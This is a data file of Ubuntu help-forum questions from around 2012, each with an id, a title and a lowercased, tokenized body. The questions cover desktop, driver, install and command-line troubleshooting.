221654	compiz setting migration from 12.04 to 12.10	i just migrated from my 12.04 home folder to a freshly installed 12.10 . i , yet again have a problem with compiz . it has not one of my custom settings ! how is it possible that , a then full copy home directory did not transfer settings ? these settings began the compiz start playing with digits on config folders . like .compiz-1 or .compiz . i have no idea how i have to use this -1 and i do not . but i 've renamed my compiz folders in .gconf and .compiz . which thing did not help in resolving this problem . how can i get my settings back ? why is this problem occurring ?
221661	recently upgraded from 12.04 to 12.10 and now sceen keeps flikering on and off	i recently installed 12.04 on my desktop and upgraded to 12.10 . since then the screen constantly goes blank every 5-8 seconds . it never did this in 12.04 . i have the same issues when i have tried to install 12.10 from a live cd .
221664	how to tune touchpad for smaller area ?	i just purchased the asus zenbook ux31a and i require some advice regarding tuning the touchpad . basically my problem is that the mouse buttons are withing the touch area and i would like it to be disabled . such that only part of the touch area is recognized . i have attached an image to clarify the idea . basically only the red area in the image should be recognized . i have two reasons for this request : firstly , i like to hold my thumb on the mouse button instead of holding it in the air . this is problematic , because touchpad thinks that i 'm trying some kind of two finger gesture all the time and cursor stops moving . clicking is also problematic since every finger movement -- regardless of how insignificant it might be -- on the `` button '' will move the cursor . i have been playing with some synclient settings like areabottomedge etc . they have some effect but then i can not highlight text or right button stops working . how could i solve this ?
221666	firewall iptables block everything and allow vpn	i would like to block all traffic on my ubuntu server with iptables and them allow only the protocols : http , https , pptp , l2tp , sstp and openvpn i have tried many ways to do this , and i would like to have a clean start , so if someone can give me an idea what is the best way to do this i will really appreciate .
221669	configure terminal such that it automatically leaves a new line after executing a command	i would like to configure the terminal so that it would leave a line after running a command . just to make stuff cleaner . there is no such setting in `` profile preferences '' . i 'm running 12.10 .
221670	how to use mate-panel in gnome-fallback mode	is it possible to run mate-panel inside gnome-fallback mode ? unity is annoying and gnome-fallback is not real gnome 2 , so it would be nice if i could combine mate and gnome-fallback .
221672	install problems on a compaq presario cq50	i have a compaq presario cq50 with vista installed on it which i am trying to install ubuntu 12.04 . i downloaded the 32 bit iso file and installed it from the hard disk . it was only later that i found out that windows was still on and booting at start up . i changed it to boot in ubuntu and tried it out . i now wanted to get rid of windows ( waste of space ) , so i created a bootable ubuntu dvd from the downloaded file . i booted from this and started the install . during the install it failed due to a problem with the dvd drive or reading the disc ? ( i can write down the problem which was displayed on screen if this will help , but this will take some time ) . after this failed install the machine will not now start up in vista or ubuntu . no problem i thought , i 'll create a bootable usb drive . i do have another presario with vista to work with to create a bootable usb drive . this time i downloaded the 64 bit amd version of 12.04 as the presario spec is as follows : 2 ghz amd turion x2 rm70 dual core processor , 1 mb l2 cache , video - nvidia geforce 8200 m - memory up to 1 gb , hard drive 200 gb ( do n't know whether it is sata ? ) . i downloaded the file and the 'pen drive ' software shown in the ubuntu install pages on the internet . the problem is the pen drive software can not see the iso file to copy ? anyone any ideas about this ? i do also have a mac running osx 10.6.8 , so i created a bootable dvd on this for the pc , but it came up with the same problem during installation of not being able to read the install files . i think the problem must be the drive as the presario can not read install files created on the other pc or mac . i could try creating a bootable usb drive on the mac , but i would mean i would have to use the 'terminal ' program and i have n't a clue what i would be doing . i think my choices are : find some more software to try and create a bootable usb ? try and install across from a networked pc if possible . i do have a 'cross over ' cable for direct linking . any help greatly received .
221686	how can i see what icons on the launcher are actually doing ?	i have a program which when i pin it to the launcher , pulses slowly 5 times but then does nothing . if i have a launcher on the desktop i can ask to see its properties so i can see what the actual command is . since the icon i have pinned does n't work ( i pin it to the launch bar , then close the program and try to fire it up again ) , i would like to see what command it is executing so i can figure out what is wrong . the answer i have received is quite useful but something unusual is apparently going on with the particular file and i would like to see what the launcher command is actually doing . the command which works is /home/ilan/fiji.app/imagej-linux32 if i make a desktop icon with this command , that will launch the application . i can even copy the desktop icon to the launch bar and it will work . here is the puzzle : if i copy the desktop icon to the launch bar , i will end up with two icons on the launch bar 1 ) the desktop icon which i copied and 2 ) the one which is actually running . it is the 2nd one which i 'd like to lock to launch bar , because it is what is really running . however if i close the application and click on it , it wo n't launch . conclusion : it is n't giving the command /home/ilan/fiji.app/imagej-linux32 so what command is it giving ? that is what i would like to know . this is medical software readily available on the web at http : //fiji.sc/
221687	can not format an hdd	i have an ssd with ubuntu installed , now , i 'm trying to format a my passport essential hdd , throught gparted with no success . i 've tried to make it primary and i 've tried to make it extented , gparted would say it had succeed , but i can not act on the hdd , seems like i have no premission . in the properties dialog box it says you are not the owner , so you can not change these permissions . i ca n't create any file nor folder in the hdd and i ca n't transfer files to the hdd .
221689	what is the interpretation of df output ?	when i execute df comman on mysystem i get the following output : - xxxxx @ xxxxx-xps-m1530 : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/sda5 21254740 8448344 11726692 42 % / udev 1024164 4 1024160 1 % /dev tmpfs 412764 848 411916 1 % /run none 5120 0 5120 0 % /run/lock none 1031900 316 1031584 1 % /run/shm none 102400 44 102356 1 % /run/user when i read info for df it says that : with no arguments , df reports the space used and available on all currently mounted file systems ( of all types ) . now i am confused here . i have not mounted any other partition on my system yet . then how is df listing six entries . i believe that i am missing something here . please indicate what it is..
221690	how do i enable extended attributes support on a wubi install ?	i am trying to install the netflix-desktop app and when i start the app up , it shows me the error : '' unable to set extended attribute : operation not supported . '' ok , so i see the answer to this question , which tells me to edit /etc/fstab , and add the user_xattr option there . seems simple . but when i open my /etc/fstab ( on a wubi install ) , i get the following : # unconfigured fstab for base system /host/ubuntu/disks/swap.disk none swap sw 0 0 which looks quite different . should i still add the user_xattr option to sw , and remount ?
221693	wifi works perfectly in windows but incosistent in ubuntu . goes up and down frequently	i am facing the problem described in this thread and this thread . to describe in brief , my internet wifi faces problem where the internet pages do n't load every few minutes and completely stop working . however i see that sometimes the services like skype or even gmail are unaffected . during this time the wifi symbol is continuously says that wifi is connected ! the internet returns after sometime and then the story repeats . important to note that wifi works perfectly fine with the windows 7 ( dual boot ) . i have also checked this at my friend 's home where wifi has problem with ubuntu but not with windows . i have come across this post discussing the similar problem . need to try that . however any better/permanent solution is welcome . edit : i have tried with wicd as mentioned in other links . it does n't appear to be a great improvement for now . i have found one more askubuntu link which i am yet to explore .
221698	how to show dashboard for micrmax 353g in ubuntu 12.04 ?	i am using ubuntu 12.04 and micromax 353g dongle for internet . everything is working fine . but here i want to see my data used in that session and the balance data . it is showing all the features in windows but as i am using ubuntu and i love this so i want all this in ubuntu . so is this possible to get a dashboard for micromax dongle dashboard on ubuntu 12.04 ? any help and suggestions will be highly appreciable .
221699	mount/unmount issues while restarting/shutting down ( not mounted / is busy )	when restarting or shutting down ubuntu 12.10 the clean ( graphic screen ) process is interrupted by the following messages : * deactivating swap ... [ ok ] * mount : /run/lock : not mounted [ fail ] * mount : /run/shm : not mounted * mount : / is busy * will now restart how can i get rid of these messages ? the system is upgraded from 11.10 and 12.04 , and 12.10 was reinstalled on top due to then unclear nvidia issues using a usb flash disk -- not sure if uefi/bios mode has something to do with that .
221700	wi-fi print ubuntu 10.04 or 12.10 lexmark	i 'm not a new user of ubuntu , but i have no idea how to print by wi-fi on the lexmark z1420 . i know that no driver on linux for this model , but i really need to make it work . please tell me what to click , choose , how to add . i have desktoppc and dap-1150 ( work only ap and repeater ) . thanks for you all .
221701	what in quickly creates an empty ... /share/gnome/help/ ... /c/figures/ folder ?	something in packaging scripts creates an empty figures folder where it 's not present before this packaging . where is it ?
221709	how do i set the volume for a custom login session ?	i have created a custom login session in /usr/share/xsessions to launch renoise ( a digital audio workstation software ) to provide the maximum resources for it by minimizing background app overhead . it works fine except for one significant detail : system volume is much lower than in the default ubuntu session . what is the most straightforward way to set the volume ? ideally i would like to be able to set it with my laptop 's regular function keys but if that would mean pulling in lots of gnome services , a hardcoded setting would also work for now . [ desktop entry ] name=renoise comment=this logs you into a stand-alone renoise session exec=renoise tryexec=renoise icon= type=application x-ubuntu-gettext-domain=gnome-session-3.0
221714	tar file bigger then original folder ?	i used `` compress '' from nautilus to a 36mb folder . it created a tar called fs.tar.gz . this fs.tar.gz has the size of 98mb . how can this be possible ? i did read somewhere that symlinks or something similar can cause this - i do have symlinks in my folder .
221715	logitech m310 does n't work on ubuntu 12.10	my wireless mouse , the logitech m310 , and the bundled keyboard , logitech k520 , do n't work on my laptop . when switching to windows 7 , they work out-of-the-box just fine . the internets say this mouse should work just fine on ubuntu too . what 's wrong here ? i 'm on a asus zenbook ux32vd , running ubuntu 12.10 ( 64bit ) . lsusb does list the receiver : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0bda:0139 realtek semiconductor corp. card reader bus 002 device 003 : id 04f2 : b330 chicony electronics co. , ltd bus 002 device 004 : id 8087:07da intel corp. dmesg | grep logitech : [ 2.566231 ] usb 3-3 : > manufacturer : logitech [ 2.574566 ] logitech-djreceiver 0003:046d : c52b.0003 : > hiddev0 , hidraw0 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:14.0-3/input2 [ 208.590420 ] usb 3-2 : > manufacturer : logitech [ 208.610791 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/input/input11 [ 208.611166 ] hid-generic 0003:046d : c521.0004 : > input , hidraw0 : usb hid v1.11 mouse [ logitech usb receiver ] on usb-0000:00:14.0-2/input0 [ 208.613884 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.1/input/input12 [ 208.614523 ] hid-generic 0003:046d : c521.0005 : > input , hiddev0 , hidraw1 : usb hid v1.11 device [ logitech usb receiver ] on usb-0000:00:14.0-2/input1
221716	ubuntu 12.10. does n't start after update	i just did the newest update from the update manager , and now after restarting ubuntu . it wo n't start anymore . i went to the login menu but when i logined unity or gnome , i could only see the desktop background and the mouse is moving but nothing else appears , no menus , nothing .
221719	uninstalling lib-proxy0 leads absence of software sources	i uninstalled lib-proxy0 from the software center . but then the ubuntu software sources and system setting disappeared from dash/home . i tried to install it with sudo apt-get install software-center but it did n't work .
221720	how to select camera in camorama ?	i have two webcams connected : dev/video0 is the laptop built in webcam and dev/video1 is an hd quality webcam that i would like to use , but camorama defaults to dev/video0 . how can i select dev/video1 ?
221722	task bar not appearing in ubuntu lxde	using ubuntu 12.04 lts , installed lxde for the heck of it . used it for a bit , then logged out and logged in . now the taskbar is n't there , and there 's a solid gray bar at the top of the screen ( width roughly the same as that of the taskbar ) . what should i do ?
221729	i ca n't finish installation of 12.10 on windows 8	when i followed the instruction to install ubuntu 12.10 with wubi , the come out window ask me to reboot the computer to finish the installation . i followed the instruction and stopped with the message i have left below . could you please tell me how to finish installation ? i 'm worried if i follow the instruction below to remove_hiberfile in windows it would result in a failure to boot my window 8 system : completing the ubuntu installation . for more installation boot options , press 'esc'now ... 0 busy box v1.19.3 ( ubuntu 1:1.19.3-7ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) windows is hibernated , refused to mount . failed to mount '/dev/sda2/ : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntsfs-3g -0 remove_hiberfile/dev/sda2/isodevice mount : mounting/dev/sda2 on /isodevice failed : no such device could not find the iso/ubuntu/install/installation.iso this could also happen if the file system is not clean because of an operating system crash , an interrupted boot process , an improper shutdown , or unplugging of a removable device without first unmounting or ejecting it . to fix this , simply reboot into windows , let it fully start , log in , run 'chkdsk/r ' , then gracefully shut down and reboot back into windows . after this you should be able to reboot again and resume the installation .
221730	themes missing after upgrade	i recently upgraded my distro ( ubuntu ) from 10.04 lucid lynx to 12.04 precise pangolin . what happened is all of the themes went missing ( there is no dropdown menu in appearance ) , and i 'm stuck with a custom theme i used under gnome . any way to get the default themes back ? this is my desktop :
221732	how to recover files after changing partition filesystem ?	i tried to install ubuntu 12.10 but for some reason the process stopped half-way and would n't progress , after some time waiting i decided to reboot and to my surprise my d : partition , where i have some files stored , was entirely occupied by ubuntu . i assume that the filesystem of the partition was changed from nfts to ext4 , so i lost access to the files on windows . later i recreated the d : partition again as nfts , with its original size , and did n't do anything else with it , hoping that none of the files would be overwritten , but the partition was empty . i expected that , as i assume during the ubuntu installation , the partition is formatted . however i was hoping it would be possible to recover them . i already used photorec tool to try the recovery of such files but all i am retrieving is thousands of text files , apart from a few intact files randomly named . is there any possibility to recover those files , given the circumstances described above ?
221733	word processor with less overhead then open/libre office ?	i 'll be honest i 've run both openoffice and libre office and i 'm not impressed with their speed/resource consumption both of them lag on my laptop and i do n't think it 's because of my hardware , for example kile a latex development environment based on kate runs better although it 's doing , i think more stuff in the background . so is there another office suite/ word processor for a kubuntu 12.10 installation , going with kate seems too low end while doing everything in kile is bringing in the big guns to early . i am mainly interested in speed and of course saving in a reasonably used format , not in having a lot of bells and whistles .
221742	large loss of files	here is the situation . i was playing with wine settings to see i could get to play some old games . long story short i ended up removing wine . right after my wife asked me to help her with something . along comes my beautiful and perfect daughter . i like , a fool did not close terminal . so with a combination of wild key presses she managed to enter the following command : sudo apt-get remove wine* holy crap ! this removed like 3/4ths of my installed programs . i am not a expert user but i know enough not to play with * . at this point i 'm about 80 % sure i 'm going to have to a fresh install . does anyone have a better idea ?
221743	how to maximize evolution	i do n't like thunderbird , so i installed evolution . after starting the application i configured my email-account and everything seems to work without a problem . except for one really annoying thing : i ca n't maximize the window . the maximize-button is missing . i also tried it via the window-menu , but even there the maximize-option is faded out . i also ca n't resize the window ( it is possible to make it larger , but not smaller ) . but as i am a netbook-user i need to either maximize or at least resize the window to fit the screen . i just installed gnome-shell and evolution starts maximized . so i 'd say , that this is a problem with unity . so to be honest , i do n't know what i should , or could do .
221744	ambiance gtk theme customisation *just* for one user	is it possible to customise the appearance of the ambiance theme just for one user ? i have read about the possibility of doing this : sudo vim /usr/share/themes/ambiance/gtk-2.0/gtkrc but could something be done to change : just one setting for just one user ? perhaps changing something in the user 's .themes directory ? notice : i would prefer not to copy the full theme to the user directory , just to provide an override mechanism after the `` global '' theme is applied , independently from the theme if possible , but anyway just specifying what needs to be different , not duplicating the whole theme definition .
221747	nvidia geforce gt 640 compatible with 12.10 ?	i was wondering if the msi nvidia geforce gt 640 1gb card is compatible with ubuntu quantal quetzal . if it is not , suggestions are welcome .
221750	how to install gnome 3 desktop in ubuntu 12.10 as alternative but not removing unity so that i can switch on demand ?	is this is the best way to change unity to gnome 3 , will it allow to login to unity again ? ( i love gnome 3 i was using for ages gnome as default desktop ) . but not sure if this is the correct way to apply in ubuntu ? or there is some better option left ? $ apt-get install ubuntu-gnome-desktop ubuntu-gnome-default-settings $ sudo dpkg-reconfigure gdm > select gdm $ sudo apt-get remove ubuntu-settings $ sudo apt-get install gnome-documents gnome-boxes $ sudo add-apt-repository ppa : gnome3-team/gnome3 $ sudo apt-get remove overlay-scrollbar* reboot
221753	samsung phone not recognized in ubuntu 12.10 using usb cable	i use ubuntu 12.10 , when i connect samsung galaxy ace plus to pc it is not recognized by ubuntu and usb icon does not appear in phone screen , so i can not connect my phone to pc . please help about it .
221755	can not boot into desktop after purging gnome3 ppa	i am dual-booting a c2d laptop with w7 x64 and ubuntu 12.10 x64 . after using the gnome3 ppa and getting a bit wary of the increased system instability , i tried to downgrade to the standard 12.10 amd64 components . i installed ppa-purge and issued the command sudo ppa-purge ppa : gnome3-team/gnome3 , accepting the solutions offered . however , instead of running the following additional commands sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install -- reinstall ubuntu-desktop i stupidly rebooted the machine . now i ca n't boot into the partition . i tried the following things in recovery mode : attempted to launch to root and then issue the above ( missing ) commands , but it gave me some error regarding not being able to write to /var/apt/*something* ( sorry but i do n't remember the exact locked path ) , attempted to launch with the 'start networking ' ( or similar ) option , but nothing happens . the system is n't frozen here , pressing the power button here shuts down the machine as expected . how do i restore my ubuntu partition without losing any data ?
221757	problems installing matlab - scientific computing environment	i have problems completing a matlab installation . i downloaded the installation files from mathworks.com and i ran the installation as root , so far so good . the problem is that i am unable to install the `` matlab - scientific computing environment '' from the software center . when i try to do the installation i get the error message `` no matlab executables were found in the directories you specified . this package requires at least one local installation of matlab . '' i thought that the problem would be solved by creating a matlab link under usr/local/bin . this enabled opening matlab independent of location , but i can still not install `` matlab - scientific computing environment '' .
221759	install ubuntu on external drive to boot on imac and pc 's	i 'd like to install ubuntu on an external hd i just bought . the downside of it is that one of the computers i might boot the external ubuntu hd is an imac 21 '' . if i install ubuntu from a pc , will it work in my imac ? what modifications will i have to do to get it working on both platforms ? thanks
221761	ubuntu 12.04 : unity stuck in 2d . compiz crashes	i have been trying to get unity to work in 3d and hardware wise there should be no problem . i have the 310.14 nvidia driver and am using a gtx660-ti card . output of : unity -- replace checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - fatal : no composite extension compiz ( composite ) - error : initscreen failed compiz ( core ) - error : could n't activate plugin 'composite' compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'opengl ' failed compiz ( core ) - error : could n't activate plugin 'opengl' compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - fatal : no composite extension compiz ( core ) - fatal : no composite extension segmentation fault ( core dumped ) what am i missing to get this working ?
221762	how to run 2 x sessions with different display managers ?	i read about the virtual terminals a little and that gave me an idea . i searched for a way to have two x sessions simultaneously . i had a look at these sites : 1 . how to run multiple user x sessions on the same computer , at the same time ? 2 . how to drag windows between 2 x servers ? i tried startx -- :1 but my earlier terminal ( on ctrl+alt+f7 ) hung up . how do i ensure this does not happen ? my main need is to get unity on :0 and gnome-shell on :1 and switch between them like workspaces . if possible , i 'd like to get login screen on tty8 or get option of logging into a different account . as per question 2 , exchanging windows between sessions is not recommended as it is not easy . but if it is possible i 'd like to know . i have ubuntu 12.04 64bit . the above command made both sessions crashed ( virtual one worked for 15 min then crashed when i switched to real ) . also , how to revert to one x session if system gets overloaded ? update : tried code in answer 3 times but system never stabilizes . either tty7 or tty8 works , but not simultaneously , for sometime before crashing .
221764	can i move the unity launcher in 12.10 ?	i 've just recently downloaded ubuntu 12.10 , and just like everyone else using the unity launcher i would like to move it to the bottom of the screen . i know there are patches for 11.10 , and i think for 12.04 , but i have n't been able to find anything to solve this problem on 12.10 . is there a way , or is everyone else with 12.10 waiting for a solution as well ?
221768	12.04 boots fine , with graphical splash screen , but then monitor `` out of range ''	i see dozens of posts from people whose monitors are saying `` out of range '' under ubuntu ; seems like there are some serious problems in ubuntu with autodetection of monitor capabilities . : - ( but none of the many , many suggestions i found have solved my problem , and right now i ca n't use anything graphical on this machine ! history : i installed ubuntu 12.04 on my hp proliant microserver n40l , which worked reasonably at the default resolution across several reboots . at some point i noticed that the proprietary video driver was not in use , and tried to install one to get better window-drawing speeds , but it failed with some sort of error , and i gave up on that . a few weeks later when i next rebooted , it showed the usual bios screen and various boot loading screens ( including grub ) , and then the usual purple ubuntu splash screen with the dots showing that things were loading , but when it finished booting the monitor went black and eventually showed `` out of range '' ( with no other information ) . given that there were several weeks between reboots ( it 's a server , after all ) , i 've no idea if it was some system update , trying to install the proprietary drivers , or something else that caused the problem . anyway , the system has booted fine , as i can do ctrl-alt-f1 to get a text prompt and can log in there . but ctrl-alt-f7 goes back to the out of range error . some posters said to try ctrl-alt -- ( minus ) to cycle through resolutions until one works , but that did n't have any visible effect . many , many others said it was a grub problem , which seems unlikely given that grub 's screen looks fine , but i tried editing /etc/default/grub to set a particular resolution ( trying many of them ) and running update-grub , with no apparent effect . rebooting into failsafe mode works the same as regular mode . replacing xorg.conf with xorg.conf.failsafe works the same too . i 'm at my wits ' end ! is n't there anything i can do to convince ubuntu to choose a mode that the monitor supports ? e.g . the one that it is using for the splash screen ? i do n't need great resolution on this machine , just anything that works ! ! ! ! ! help ! ! ! ! ! ! please ! ! ! !
221769	offline mysql installation ( using deb file and no internet connection )	i downloaded mysql 's installation package and ran the following command after installing a fresh ubuntu server . dpkg -i mysql-5.5.28-debian6.0-x86_64.deb it installed fine and then i tried starting up the server manually /opt/mysql/server-5.5/bin/mysqld and the following error came up /opt/mysql/server-5.5/bin/mysqld : error while loading shared libraries : libaio.so.1 : can not open shared object file : no such file or directory how can i install that library in an offline way ? i have no means whatsoever to an internet connection from that server and i ca n't even relocate it to have internet connection temporarily ! thank you .
221772	how to enable lubuntu-12.10-alternate-amd64.iso to pxe network install the graphical desktop ?	i have successfully used lubuntu-12.10-alternate-amd64.iso to pxe network install a server . but so far , i have not been able to get the desktop login installed regardless what i put in in the preseed file : tasksel tasksel/first multiselect lubuntu-desktop d-i pkgsel/include string lubuntu-desktop neither triggered a desktop ui install . the logs in the /var/log/installer subdirectory do not give me any clue either . i have got around this `` issue '' by running a preseed/late_command or use the iso 's content in conjunction with a local repository mirror . btw , i have noticed that the packages.gz in the iso 's universe/debian-installer/binary-amd64 does n't have any content . replacing it with the one in the universe/binary-amd64 and adding a release file does n't result a graphical ui install either . how can i `` fix '' the iso 's content so that i can use it for a desktop install with both a burned cd and pxe network boot ?
221775	how to get presentation tools like windows office without windows office ?	on working with ms office and libreoffice i found that ( as countless have ) libreoffice is not quite up to windows ' level . i would like windows office on ubuntu but that means using wine , which i do n't want . i tried using wine but it went a teansy bit wrong ( where i have no idea ) . so i tend to avoid it . hence the question : is there any way i can get any program/plugin/patch/anyting-i-missed to get same functionality as ms office in ubuntu ? i have ubuntu 12.04 64bit ( if required ) .
221777	sim card number swap	is it possible to swap two numbers between two sim cards ? ( i just purchased a new phone and it is using a micro sim ) and i have a old number that i want to use but it is on standard sim card . is it possible to swap the numbers between the cards using a sim card reader . what software and hardware should i use ? note : i have talked with my provider but i have to cancel my old number 's contract . problem is i like it and do not want to pay the remaining period of the contract to turn it in to payasyougo and then swap ...
221778	stuck in screen saver during upgrade	i 'm upgrading from a lts version to an other . the screen saver is now on and i ca n't exit it . if i type my password or move the mouse the screen flickers . regardless of what i do the screen saver stays and the login prompt never shows . if i type my password and then hit enter , it does nothing . last time i checked the packages were all downloaded and i was in the install process . i really want this upgrade to work . it would be really bad to have to restart from a fresh install . cheers .
221788	test application without modifying system	i was confronted with a situation where i needed a particular application which is either too old or too new ( still alpha ) or install from a potentially risky ppa . is there a way to install an application in a sort of sandbox where it would n't be allowed to modify my system ? i know i could have a virtual machine with another ubuntu install but i would like to avoid this if possible .
221791	is there a way to have translucent desktop icon label backgrounds in unity ?	this is my first post here , and i 'm still new to unity . i did a quick search and took a brief look at the suggested questions while posting this , and i ca n't seem to find an answer . i 've been using ubuntu from time to time since 9.04 , but i skipped several versions up to 11.10 . i 'm currently using 12.04 i like unity , but i also installed other de 's , including xfce , cinnamon and gnome-shell . even though i 've installed many alternatives , i still use unity most of the time . at this moment i 'm using xfce , and i 'd love to have icon label bacgrounds in unity . you know , sometimes it 's hard to see the labels when you have a colorful wallpaper ( a landscape , for example ) . and i 'd like labels to be translucent , like in xfce ( see screenshot ) . i 'm no fan of opaque windows 95 icon labels at all : ) thanks in advance !
221794	why fan speed/noise problem occuring on desktop with nvidia geforce 9600 gt ?	i 've read and tried every single thing suggested for solving this sort of problem in this forum and all over the internet and nothing worked , everything from changing grub configurations to installing jupiter and other fan controller software , cpufreqd and cpufrequtils , every single thing . the computer still keeps making too much noise , which does n't happen when i run windows 7 . i 'm running a dual-boot system with ubuntu 12.10 ( quantal ) 32bit and windows 7 , kernel linux 3.5.0-18-generic gnome 3.6.0 i have 2 gb ram and an intel® core™2 duo cpu e4500 @ 2.20ghz × 2 my graphics card is nvidia geforce 9600 gt
221797	problems with installation	i have downloaded ubuntu three times ; twice on a live dvd and once on my desktop . now my dvd player is an sata drive so it does n't register as a dvd it reads as another hd in the bios menu so i ca n't make it boot as a first boot device . the program does n't have an executable or auto run so please help me . how do i install ubuntu onto my computer ?
221798	unity-reset on boot - ubuntu 12.10 unity problem	i tried many many workarounds for the unity fix in 12.10 ubuntu version ... i have ati mobility radeon hd3650 graphics card.. i managed to install the 12.6 version of it , and downgrade the x-server from 1.13 to 1.12.3 using the code below of this guy 'makarewicz' code : sudo add-apt-repository ppa : makson96/fglrx sudo apt-get update sudo apt-get upgrade sudo apt-get install fglrx-legacy now i using fglrxinfo i get display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati mobility radeon hd 3650 opengl version string : 3.3.11653 compatibility profile context but still on boot i cant see unity . however using in a tty unity or unity-reset , i can have unity , until i reboot ... so is there a way to make this permanent ? thank you
221801	how can i run a job yearly with anacron ?	i 'd like to use anacron to run a job annually . i see only daily , weekly , and monthly configuration for anacron . is there a way to run a job once per year ?
221803	problem using avconv to convert .mp4 to .webm	i 'll try to describe my situation : i have an android phone makes video in mp4 format . i like to share this video on my web page and jwplayer . such that operates well . i use one script to make all and all works fine . i use to convert the file in webm , and inserting in jwplayer with this type of embedding code : < div id= '' player '' align= '' center '' > < script src= '' jwplayer.js '' type= '' text/javascript '' > < /script > < script type= '' text/javascript '' > jwplayer ( `` player '' ) .setup ( { height : 270 , image : `` thumb.png '' , levels : [ { file : 'file.mp4 ' , type : 'video/mp4 ' } , { file : 'file.webm ' , type : 'video/webm ' } , ] , modes : [ { type : 'html5 ' } , { type : 'flash ' , src : 'player.swf ' } ] , width : 480 } ) ; < /script > < /div > to convert from mp4 to webm i use simply this command : avconv -i `` $ file '' .mp4 `` $ file '' .webm ok ! now the problem is with my new photo camera . my pentax makes video in avi and in this case to embedding with my jwplayer i need one mp4 and one webm file . ok i use this command : avconv -i `` $ videoname '' .avi -c : v libx264 -crf 23 -c : a libfaac -b : a 192k `` $ videoname '' .mp4 the results are positive . now if i use to convert this new mp4 in webm with : avconv -i `` $ file '' .mp4 `` $ file '' .webm the webm file does n't work ... . example ffprobe with the avi file : $ ffprobe imgp0129.avi avprobe version 0.8.4-4:0.8.4-0ubuntu0.12.04.1 , copyright ( c ) 2007-2012 the libav > developers built on nov 6 2012 16:51:33 with gcc 4.6.3 input # 0 , avi , from 'imgp0129.avi ' : duration : 00:00:44.64 , start : 0.000000 , bitrate : 27089 kb/s stream # 0.0 : video : mjpeg , yuvj420p , 1280x720 , 30.08 tbr , 30.08 tbn , 30.08 tbc stream # 0.1 : audio : pcm_u8 , 32000 hz , 1 channels , u8 , 256 kb/s example of error message for the webm in output : avconv -i output.mp4 out2.webm avconv version 0.8.4-4:0.8.4-0ubuntu0.12.04.1 , copyright ( c ) 2000-2012 the libav > developers built on nov 6 2012 16:51:33 with gcc 4.6.3 input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from 'output.mp4 ' : metadata : major_brand : isom minor_version : 512 compatible_brands : isomiso2avc1mp41 encoder : lavf53.21.0 duration : 00:00:04.99 , start : 0.000000 , bitrate : 2228 kb/s stream # 0.0 ( und ) : video : h264 ( main ) , yuvj420p , 1280x720 , 2193 kb/s , 30.01 fps , > 30.01 tbr , 500k tbn , 60.01 tbc stream # 0.1 ( und ) : audio : aac , 32000 hz , mono , s16 , 54 kb/s incompatible pixel format 'yuvj420p ' for codec 'libvpx ' , auto-selecting format 'yuv420p' [ buffer @ 0x2345340 ] w:1280 h:720 pixfmt : yuvj420p [ avsink @ 0x2356540 ] auto-inserting filter 'auto-inserted scaler 0 ' between the filter > 'src ' and the filter 'out' [ scale @ 0x2343220 ] w:1280 h:720 fmt : yuvj420p - > w:1280 h:720 fmt : yuv420p flags:0x4 [ libvpx @ 0x23468a0 ] v1.0.0 output # 0 , webm , to 'out2.webm ' : metadata : major_brand : isom minor_version : 512 compatible_brands : isomiso2avc1mp41 encoder : lavf53.21.0 stream # 0.0 ( und ) : video : libvpx , yuv420p , 1280x720 , q=-1 -- 1 , 200 kb/s , 1k tbn , > 30.01 tbc stream # 0.1 ( und ) : audio : libvorbis , 32000 hz , mono , s16 stream mapping : stream # 0:0 - > # 0:0 ( h264 - > libvpx ) stream # 0:1 - > # 0:1 ( aac - > libvorbis ) press ctrl-c to stop encoding [ webm @ 0x2344de0 ] application provided invalid , non monotonically increasing dts to > **muxer in stream 0 : 33 > = 33 *strong text*av_interleaved_write_frame ( ) : invalid argument** any suggestions ?
221805	lower casing and truncating a variable in a shell script	i am trying to convert a variable to lower case and strip a suffix at the same time . the variable contains a file name and i am stripping the extension : for f in *.shp ; do echo $ { f % . * } ; done to convert a variable to lowercase i know the command is , $ { f , , } but how do i convert $ { f % . * } to lower case within the loop ?
221809	rhythm box music importing problem	recently i switched to ubuntu 12.10 . i am trying to import songs from an ntfs partition . the weird behaviour i get is that to some extent it imported few songs , almost 7000 , then some error ocurred relating to metadata . now it starts removing tracks on its own . the figure keeps on decrementing and finally all the music library gets empty . this happens each time i restart the player . i really need this thing working as i want to use ubuntu but not without listening to music .
221813	do different desktop environments affect game performance ?	i am in the midst of building my own ubuntu gaming computer , and i was wondering : if i used a variation of ubuntu , such as lubuntu , would more resources be put into the game ( s ) , because the operating system is for lower specs ? or would the game ( s ) , for the same reasons , be slower than it would on regular ubuntu ? or would they be effected at all ? on the other hand , for regular ubuntu , would the same above apply to different desktop environments ? hope this makes sense : s
